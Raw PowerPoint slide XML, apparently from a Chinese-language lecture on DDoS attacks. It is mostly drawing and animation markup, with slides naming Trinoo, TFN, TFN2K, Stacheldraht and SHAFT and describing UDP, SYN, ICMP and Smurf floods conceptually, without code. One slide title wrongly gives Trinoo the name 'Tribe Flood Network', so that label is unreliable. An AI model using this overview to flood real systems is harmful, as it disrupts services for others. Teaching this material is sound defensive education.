                  <a:gd name="T25" fmla="*/ 0 h 716"/>
                  <a:gd name="T26" fmla="*/ 0 w 1220"/>
                  <a:gd name="T27" fmla="*/ 0 h 716"/>
                  <a:gd name="T28" fmla="*/ 0 w 1220"/>
                  <a:gd name="T29" fmla="*/ 0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85"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="432" y="3235"/>
                <a:ext cx="457" cy="247"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1371"/>
                  <a:gd name="T1" fmla="*/ 0 h 741"/>
                  <a:gd name="T2" fmla="*/ 0 w 1371"/>
                  <a:gd name="T3" fmla="*/ 0 h 741"/>
                  <a:gd name="T4" fmla="*/ 0 w 1371"/>
                  <a:gd name="T5" fmla="*/ 0 h 741"/>
                  <a:gd name="T6" fmla="*/ 0 w 1371"/>
                  <a:gd name="T7" fmla="*/ 0 h 741"/>
                  <a:gd name="T8" fmla="*/ 0 w 1371"/>
                  <a:gd name="T9" fmla="*/ 0 h 741"/>
                  <a:gd name="T10" fmla="*/ 0 w 1371"/>
                  <a:gd name="T11" fmla="*/ 0 h 741"/>
                  <a:gd name="T12" fmla="*/ 0 w 1371"/>
                  <a:gd name="T13" fmla="*/ 0 h 741"/>
                  <a:gd name="T14" fmla="*/ 0 w 1371"/>
                  <a:gd name="T15" fmla="*/ 0 h 741"/>
                  <a:gd name="T16" fmla="*/ 0 w 1371"/>
                  <a:gd name="T17" fmla="*/ 0 h 741"/>
                  <a:gd name="T18" fmla="*/ 0 w 1371"/>
                  <a:gd name="T19" fmla="*/ 0 h 741"/>
                  <a:gd name="T20" fmla="*/ 0 w 1371"/>
                  <a:gd name="T21" fmla="*/ 0 h 741"/>
                  <a:gd name="T22" fmla="*/ 0 w 1371"/>
                  <a:gd name="T23" fmla="*/ 0 h 741"/>
                  <a:gd name="T24" fmla="*/ 0 w 1371"/>
                  <a:gd name="T25" fmla="*/ 0 h 741"/>
                  <a:gd name="T26" fmla="*/ 0 w 1371"/>
                  <a:gd name="T27" fmla="*/ 0 h 741"/>
                  <a:gd name="T28" fmla="*/ 0 w 1371"/>
                  <a:gd name="T29" fmla="*/ 0 h 741"/>
                  <a:gd name="T30" fmla="*/ 0 w 1371"/>
                  <a:gd name="T31" fmla="*/ 0 h 741"/>
                  <a:gd name="T32" fmla="*/ 0 w 1371"/>
                  <a:gd name="T33" fmla="*/ 0 h 741"/>
                  <a:gd name="T34" fmla="*/ 0 w 1371"/>
                  <a:gd name="T35" fmla="*/ 0 h 741"/>
                  <a:gd name="T36" fmla="*/ 0 w 1371"/>
                  <a:gd name="T37" fmla="*/ 0 h 741"/>
                  <a:gd name="T38" fmla="*/ 0 w 1371"/>
                  <a:gd name="T39" fmla="*/ 0 h 741"/>
                  <a:gd name="T40" fmla="*/ 0 w 1371"/>
                  <a:gd name="T41" fmla="*/ 0 h 741"/>
                  <a:gd name="T42" fmla="*/ 0 w 1371"/>
                  <a:gd name="T43" fmla="*/ 0 h 741"/>
                  <a:gd name="T44" fmla="*/ 0 w 1371"/>
                  <a:gd name="T45" fmla="*/ 0 h 741"/>
                  <a:gd name="T46" fmla="*/ 0 w 1371"/>
                  <a:gd name="T47" fmla="*/ 0 h 741"/>
                  <a:gd name="T48" fmla="*/ 0 w 1371"/>
                  <a:gd name="T49" fmla="*/ 0 h 741"/>
                  <a:gd name="T50" fmla="*/ 0 w 1371"/>
                  <a:gd name="T51" fmla="*/ 0 h 741"/>
                  <a:gd name="T52" fmla="*/ 0 w 1371"/>
                  <a:gd name="T53" fmla="*/ 0 h 741"/>
                  <a:gd name="T54" fmla="*/ 0 w 1371"/>
                  <a:gd name="T55" fmla="*/ 0 h 741"/>
                  <a:gd name="T56" fmla="*/ 0 w 1371"/>
                  <a:gd name="T57" fmla="*/ 0 h 741"/>
                  <a:gd name="T58" fmla="*/ 0 w 1371"/>
                  <a:gd name="T59" fmla="*/ 0 h 741"/>
                  <a:gd name="T60" fmla="*/ 0 w 1371"/>
                  <a:gd name="T61" fmla="*/ 0 h 741"/>
                  <a:gd name="T62" fmla="*/ 0 w 1371"/>
                  <a:gd name="T63" fmla="*/ 0 h 741"/>
                  <a:gd name="T64" fmla="*/ 0 w 1371"/>
                  <a:gd name="T65" fmla="*/ 0 h 741"/>
                  <a:gd name="T66" fmla="*/ 0 w 1371"/>
                  <a:gd name="T67" fmla="*/ 0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86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="876" y="3422"/>
                <a:ext cx="366" cy="75"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1099"/>
                  <a:gd name="T1" fmla="*/ 0 h 225"/>
                  <a:gd name="T2" fmla="*/ 0 w 1099"/>
                  <a:gd name="T3" fmla="*/ 0 h 225"/>
                  <a:gd name="T4" fmla="*/ 0 w 1099"/>
                  <a:gd name="T5" fmla="*/ 0 h 225"/>
                  <a:gd name="T6" fmla="*/ 0 w 1099"/>
                  <a:gd name="T7" fmla="*/ 0 h 225"/>
                  <a:gd name="T8" fmla="*/ 0 w 1099"/>
                  <a:gd name="T9" fmla="*/ 0 h 225"/>
                  <a:gd name="T10" fmla="*/ 0 w 1099"/>
                  <a:gd name="T11" fmla="*/ 0 h 225"/>
                  <a:gd name="T12" fmla="*/ 0 w 1099"/>
                  <a:gd name="T13" fmla="*/ 0 h 225"/>
                  <a:gd name="T14" fmla="*/ 0 w 1099"/>
                  <a:gd name="T15" fmla="*/ 0 h 225"/>
                  <a:gd name="T16" fmla="*/ 0 w 1099"/>
                  <a:gd name="T17" fmla="*/ 0 h 225"/>
                  <a:gd name="T18" fmla="*/ 0 w 1099"/>
                  <a:gd name="T19" fmla="*/ 0 h 225"/>
                  <a:gd name="T20" fmla="*/ 0 w 1099"/>
                  <a:gd name="T21" fmla="*/ 0 h 225"/>
                  <a:gd name="T22" fmla="*/ 0 w 1099"/>
                  <a:gd name="T23" fmla="*/ 0 h 225"/>
                  <a:gd name="T24" fmla="*/ 0 w 1099"/>
                  <a:gd name="T25" fmla="*/ 0 h 225"/>
                  <a:gd name="T26" fmla="*/ 0 w 1099"/>
                  <a:gd name="T27" fmla="*/ 0 h 225"/>
                  <a:gd name="T28" fmla="*/ 0 w 1099"/>
                  <a:gd name="T29" fmla="*/ 0 h 225"/>
                  <a:gd name="T30" fmla="*/ 0 w 1099"/>
                  <a:gd name="T31" fmla="*/ 0 h 225"/>
                  <a:gd name="T32" fmla="*/ 0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87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="693" y="2847"/>
                <a:ext cx="977" cy="406"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2930"/>
                  <a:gd name="T1" fmla="*/ 0 h 1217"/>
                  <a:gd name="T2" fmla="*/ 0 w 2930"/>
                  <a:gd name="T3" fmla="*/ 0 h 1217"/>
                  <a:gd name="T4" fmla="*/ 0 w 2930"/>
                  <a:gd name="T5" fmla="*/ 0 h 1217"/>
                  <a:gd name="T6" fmla="*/ 0 w 2930"/>
                  <a:gd name="T7" fmla="*/ 0 h 1217"/>
                  <a:gd name="T8" fmla="*/ 0 w 2930"/>
                  <a:gd name="T9" fmla="*/ 0 h 1217"/>
                  <a:gd name="T10" fmla="*/ 0 w 2930"/>
                  <a:gd name="T11" fmla="*/ 0 h 1217"/>
                  <a:gd name="T12" fmla="*/ 0 w 2930"/>
                  <a:gd name="T13" fmla="*/ 0 h 1217"/>
                  <a:gd name="T14" fmla="*/ 0 w 2930"/>
                  <a:gd name="T15" fmla="*/ 0 h 1217"/>
                  <a:gd name="T16" fmla="*/ 0 w 2930"/>
                  <a:gd name="T17" fmla="*/ 0 h 1217"/>
                  <a:gd name="T18" fmla="*/ 0 w 2930"/>
                  <a:gd name="T19" fmla="*/ 0 h 1217"/>
                  <a:gd name="T20" fmla="*/ 0 w 2930"/>
                  <a:gd name="T21" fmla="*/ 0 h 1217"/>
                  <a:gd name="T22" fmla="*/ 0 w 2930"/>
                  <a:gd name="T23" fmla="*/ 0 h 1217"/>
                  <a:gd name="T24" fmla="*/ 0 w 2930"/>
                  <a:gd name="T25" fmla="*/ 0 h 1217"/>
                  <a:gd name="T26" fmla="*/ 0 w 2930"/>
                  <a:gd name="T27" fmla="*/ 0 h 1217"/>
                  <a:gd name="T28" fmla="*/ 0 w 2930"/>
                  <a:gd name="T29" fmla="*/ 0 h 1217"/>
                  <a:gd name="T30" fmla="*/ 0 w 2930"/>
                  <a:gd name="T31" fmla="*/ 0 h 1217"/>
                  <a:gd name="T32" fmla="*/ 0 w 2930"/>
                  <a:gd name="T33" fmla="*/ 0 h 1217"/>
                  <a:gd name="T34" fmla="*/ 0 w 2930"/>
                  <a:gd name="T35" fmla="*/ 0 h 1217"/>
                  <a:gd name="T36" fmla="*/ 0 w 2930"/>
                  <a:gd name="T37" fmla="*/ 0 h 1217"/>
                  <a:gd name="T38" fmla="*/ 0 w 2930"/>
                  <a:gd name="T39" fmla="*/ 0 h 1217"/>
                  <a:gd name="T40" fmla="*/ 0 w 2930"/>
                  <a:gd name="T41" fmla="*/ 0 h 1217"/>
                  <a:gd name="T42" fmla="*/ 0 w 2930"/>
                  <a:gd name="T43" fmla="*/ 0 h 1217"/>
                  <a:gd name="T44" fmla="*/ 0 w 2930"/>
                  <a:gd name="T45" fmla="*/ 0 h 1217"/>
                  <a:gd name="T46" fmla="*/ 0 w 2930"/>
                  <a:gd name="T47" fmla="*/ 0 h 1217"/>
                  <a:gd name="T48" fmla="*/ 0 w 2930"/>
                  <a:gd name="T49" fmla="*/ 0 h 1217"/>
                  <a:gd name="T50" fmla="*/ 0 w 2930"/>
                  <a:gd name="T51" fmla="*/ 0 h 1217"/>
                  <a:gd name="T52" fmla="*/ 0 w 2930"/>
                  <a:gd name="T53" fmla="*/ 0 h 1217"/>
                  <a:gd name="T54" fmla="*/ 0 w 2930"/>
                  <a:gd name="T55" fmla="*/ 0 h 1217"/>
                  <a:gd name="T56" fmla="*/ 0 w 2930"/>
                  <a:gd name="T57" fmla="*/ 0 h 1217"/>
                  <a:gd name="T58" fmla="*/ 0 w 2930"/>
                  <a:gd name="T59" fmla="*/ 0 h 1217"/>
                  <a:gd name="T60" fmla="*/ 0 w 2930"/>
                  <a:gd name="T61" fmla="*/ 0 h 1217"/>
                  <a:gd name="T62" fmla="*/ 0 w 2930"/>
                  <a:gd name="T63" fmla="*/ 0 h 1217"/>
                  <a:gd name="T64" fmla="*/ 0 w 2930"/>
                  <a:gd name="T65" fmla="*/ 0 h 1217"/>
                  <a:gd name="T66" fmla="*/ 0 w 2930"/>
                  <a:gd name="T67" fmla="*/ 0 h 1217"/>
                  <a:gd name="T68" fmla="*/ 0 w 2930"/>
                  <a:gd name="T69" fmla="*/ 0 h 1217"/>
                  <a:gd name="T70" fmla="*/ 0 w 2930"/>
                  <a:gd name="T71" fmla="*/ 0 h 1217"/>
                  <a:gd name="T72" fmla="*/ 0 w 2930"/>
                  <a:gd name="T73" fmla="*/ 0 h 1217"/>
                  <a:gd name="T74" fmla="*/ 0 w 2930"/>
                  <a:gd name="T75" fmla="*/ 0 h 1217"/>
                  <a:gd name="T76" fmla="*/ 0 w 2930"/>
                  <a:gd name="T77" fmla="*/ 0 h 1217"/>
                  <a:gd name="T78" fmla="*/ 0 w 2930"/>
                  <a:gd name="T79" fmla="*/ 0 h 1217"/>
                  <a:gd name="T80" fmla="*/ 0 w 2930"/>
                  <a:gd name="T81" fmla="*/ 0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88"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="607" y="2835"/>
                <a:ext cx="162" cy="115"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 486"/>
                  <a:gd name="T1" fmla="*/ 0 h 344"/>
                  <a:gd name="T2" fmla="*/ 0 w 486"/>
                  <a:gd name="T3" fmla="*/ 0 h 344"/>
                  <a:gd name="T4" fmla="*/ 0 w 486"/>
                  <a:gd name="T5" fmla="*/ 0 h 344"/>
                  <a:gd name="T6" fmla="*/ 0 w 486"/>
                  <a:gd name="T7" fmla="*/ 0 h 344"/>
                  <a:gd name="T8" fmla="*/ 0 w 486"/>
                  <a:gd name="T9" fmla="*/ 0 h 344"/>
                  <a:gd name="T10" fmla="*/ 0 w 486"/>
                  <a:gd name="T11" fmla="*/ 0 h 344"/>
                  <a:gd name="T12" fmla="*/ 0 w 486"/>
                  <a:gd name="T13" fmla="*/ 0 h 344"/>
                  <a:gd name="T14" fmla="*/ 0 w 486"/>
                  <a:gd name="T15" fmla="*/ 0 h 344"/>
                  <a:gd name="T16" fmla="*/ 0 w 486"/>
                  <a:gd name="T17" fmla="*/ 0 h 344"/>
                  <a:gd name="T18" fmla="*/ 0 w 486"/>
                  <a:gd name="T19" fmla="*/ 0 h 344"/>
                  <a:gd name="T20" fmla="*/ 0 w 486"/>
                  <a:gd name="T21" fmla="*/ 0 h 344"/>
                  <a:gd name="T22" fmla="*/ 0 w 486"/>
                  <a:gd name="T23" fmla="*/ 0 h 344"/>
                  <a:gd name="T24" fmla="*/ 0 w 486"/>
                  <a:gd name="T25" fmla="*/ 0 h 344"/>
                  <a:gd name="T26" fmla="*/ 0 w 486"/>
                  <a:gd name="T27" fmla="*/ 0 h 344"/>
                  <a:gd name="T28" fmla="*/ 0 w 486"/>
                  <a:gd name="T29" fmla="*/ 0 h 344"/>
                  <a:gd name="T30" fmla="*/ 0 w 486"/>
                  <a:gd name="T31" fmla="*/ 0 h 344"/>
                  <a:gd name="T32" fmla="*/ 0 w 486"/>
                  <a:gd name="T33" fmla="*/ 0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89"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2878"/>
                <a:ext cx="58" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 173"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 173"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 173"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 173"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 173"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 173"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 173"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 173"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0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12" name="Picture 102" descr="skullt"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print">
              <a:lum bright="40000" contrast="40000"/>
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3563888" y="34758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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7342188" y="2708275"/>
            <a:ext cx="1439862" cy="1982788"/>
            <a:chOff x="9036496" y="4075906"/>
            <a:chExt cx="1440160" cy="1982442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37900" name="PPBand282"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9036496" y="5670550"/>
              <a:ext cx="144016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spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="de-DE" sz="2400" b="1"/>
                <a:t>目标系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37901" name="Picture 118" descr="DESKC0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44000" y="4075906"/>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909192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nodeType="afterGroup">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87170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387170"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="387170"/>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 presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>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70"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dirty="0"/>
              <a:t>最常使用攻击程序：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TFN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TFN2K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Stacheldraht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SHAFT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击常用方式</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183</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974489933"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随机指向目标端的各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，产生大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不可到达报文，严重增加目标主机负担并占用带宽，使对目标主机的正常访问无法进行。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7170" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Trinoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Tribe Flood Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</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184</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="847600111"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>给主控端或分布端下命令，其来源可以做假。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>可发动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>SYN flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>UDP flood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>ICMP flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>等攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体"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185</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1062042699"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TFN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的增强版，增加了许多新功能：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单向的对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的控制通道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Master</a:t>
            </a:r>
            <a:r>
